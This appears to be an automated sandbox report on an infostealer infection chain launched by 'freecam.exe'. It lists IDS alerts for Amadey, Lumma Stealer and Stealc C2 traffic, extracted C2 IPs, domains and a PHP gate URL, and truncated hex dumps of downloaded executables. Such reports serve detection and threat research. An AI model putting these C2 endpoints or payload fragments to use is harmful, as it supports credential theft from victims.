m.xdr.xgz.xif.xla.xlb.xlc.xld.xlk.xll.xlm.xls.xlt.xlv.xlw.xml.xmz.xpi.xpm.xsr.xwd.xyz.zip.zoo.zsh/qps0000044006600x%x108012341;311;321;331;341;351;361;371;4420063125: p=::/0:ext<!--<%s>ACDTACSTAEDTAESTAKDTAKSTAMP;AUTHAWSTAcy;Afr;AhomAnd;AtoiAumlBcy;BetaBfr;ByteCESTCHARCOFFCOM1COM2COM3COM4COM5COM6COM7COM8COM9COPYCallCap;Cfr;ChamCharChi;Cup;DATADashDataDateDcy;Del;Dfr;Dot;EESTENG;ETH;EXECEcy;Efr;EnumEta;EtagEumlFcy;Ffr;FileFromGOGCGcy;Gfr;GoneHEADHat;Hfr;HighHostIMAGINFOIcy;Ifr;Int;IotaIumlJcy;Jfr;JulyJuneKcy;Kfr;KindLEAFLOCKLPT1LPT2LPT3LPT4LPT5LPT6LPT7LPT8LPT9LTCGLcy;Lfr;LisuLongLsh;MOVEMap;Mcy;Mfr;MiaoMiscModiNASANB10NOOPNULLNZDTNZSTNameNcy;NewaNfr;Not;NullOcy;Ofr;OumlPE32PE64PINGPOGOPOSTPathPcy;Pfr;Phi;Psi;QUITQUOTQfr;REG;RSDSRSETRcy;Rfr;Rho;Rsh;SASTScy;Sfr;StatSub;Sum;Sup;TRUETab;Tau;Tcy;Tfr;ThaiTo: TrapTrueTypeUcy;Ufr;UintUumlVcy;Vee;Vfr;VoidWARNWfr;WordXBOXXXX_Xfr;Ycy;Yfr;YumlZcy;ZetaZfr;[]%s\/[]\u00 source: freecam.exe, 00000007.00000002.2669978281.0000000000968000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0d287ea527.exe, 00000009.00000003.2851498640.0000000007AE0000.00000004.00001000.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000002.2948806389.0000000005752000.00000040.00000800.00020000.00000000.sdmp, a8e43ec2b6.exe, 0000001F.00000002.2853171135.0000000000142000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: nss3.pdb source: c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: mozglue.pdb source: c4df60870c.exe, 0000000A.00000002.3022164511.000000006BF0D000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: freecam.exe, 00000007.00000002.2708343431.0000000011E2E000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Directory queried: number of queries: 1666

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe	Memory has grown: Private usage: 17MB later: 41MB
Source: firefox.exe	Memory has grown: Private usage: 1MB later: 191MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49786 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49798
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49845 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:51650 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:62892 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:59659 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:59286 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:62431 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.4:57561 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49880 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49877 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49885 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49892 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49897 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49902 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49900 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49911 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49915 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49917 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49909
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49909
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:51691 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:60000 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:54836 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:52344 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:61458 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49934 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49949 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49950 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49968 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49984 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49998 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50021 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50051 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60481 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49952 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:61019 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:50700 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:55546 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:54982 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:64493 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60560 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60563 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60570 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60572 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60575 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60573 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60574 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:60576 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49880 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49885 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49885 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49880 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49923 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49923 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49911 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49951 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49951 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49952 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49949 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49952 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49964 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49934 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49934 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:60481 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:60494 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:60560 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:60560 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:60563 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:60563 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:60576 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:60570 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:60575 -> 104.21.5.155:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor	URLs: mutterissuen.shop
Source: Malware configuration extractor	URLs: nightybinybz.shop
Source: Malware configuration extractor	URLs: respectabosiz.shop
Source: Malware configuration extractor	URLs: standartedby.shop
Source: Malware configuration extractor	URLs: bakedstusteeb.shop
Source: Malware configuration extractor	URLs: conceszustyb.shop
Source: Malware configuration extractor	URLs: worddosofrm.shop
Source: Malware configuration extractor	URLs: moutheventushz.shop
Source: Malware configuration extractor	URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: unknown

Network traffic detected: DNS query count 38

Source: global traffic

TCP traffic: 192.168.2.4:60464 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:46:07 GMTContent-Type: application/octet-streamContent-Length: 13504000Last-Modified: Tue, 05 Nov 2024 16:50:43 GMTConnection: keep-aliveETag: "672a4ce3-ce0e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 60 cd 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 62 61 00 00 04 08 00 00 00 00 00 80 a6 06 00 00 10 00 00 00 60 c0 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 70 d1 00 00 04 00 00 d4 f4 ce 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 ca 00 10 04 00 00 00 c0 d0 00 50 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ca 00 fe bd 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 6f c0 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 45 60 61 00 00 10 00 00 00 62 61 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8c dc 5e 00 00 80 61 00 00 de 5e 00 00 66 61 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e0 7f 0a 00 00 60 c0 00 00 58 07 00 00 44 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 10 04 00 00 00 e0 ca 00 00 06 00 00 00 9c c7 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 fe bd 05 00 00 f0 ca 00 00 be 05 00 00 a2 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 b0 d0 00 00 02 00 00 00 60 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 50 aa 00 00 00 c0 d0 00 00 ac 00 00 00 62 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:46:16 GMTContent-Type: application/octet-streamContent-Length: 3147776Last-Modified: Tue, 05 Nov 2024 16:57:50 GMTConnection: keep-aliveETag: "672a4e8e-300800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 10 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 30 00 00 04 00 00 a8 c2 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 78 75 61 65 77 6a 67 00 50 2a 00 00 b0 05 00 00 4c 2a 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 61 66 6e 75 76 6d 6e 00 10 00 00 00 00 30 00 00 04 00 00 00 e2 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 30 00 00 22 00 00 00 e6 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:46:23 GMTContent-Type: application/octet-streamContent-Length: 2095616Last-Modified: Tue, 05 Nov 2024 16:58:03 GMTConnection: keep-aliveETag: "672a4e9b-1ffa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 50 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 71 00 00 04 00 00 8a bc 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 